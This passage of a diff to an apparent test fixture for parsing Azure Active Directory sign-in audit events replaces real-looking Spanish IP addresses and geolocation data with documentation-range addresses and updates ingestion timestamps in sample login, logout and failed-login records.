Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970252800Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -4797,25 +4173,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4829,7 +4187,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -4867,7 +4225,7 @@ }, "related": { "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -4879,12 +4237,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051600900Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970258400Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4920,25 +4278,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4952,7 +4292,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Failed", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "UserAuthenticationMethod": "1", @@ -5003,7 +4343,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -5015,12 +4355,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051603800Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970264Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -5059,25 +4399,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5091,7 +4413,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -5141,7 +4463,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -5153,12 +4475,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051606500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970269500Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -5197,25 +4519,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5229,7 +4533,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -5279,7 +4583,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -5291,12 +4595,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051609400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970275200Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -5335,25 +4639,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5367,7 +4653,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "Not Available", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "OAuth2:Logout" @@ -5405,7 +4691,7 @@ }, "related": { "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -5417,12 +4703,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051612300Z", - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970279Z", + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -5458,25 +4744,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5490,7 +4758,7 @@ "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ResultStatus": "Failed", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "ResultStatusDetail": "Success", "UserAuthenticationMethod": "1", @@ -5541,7 +4809,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
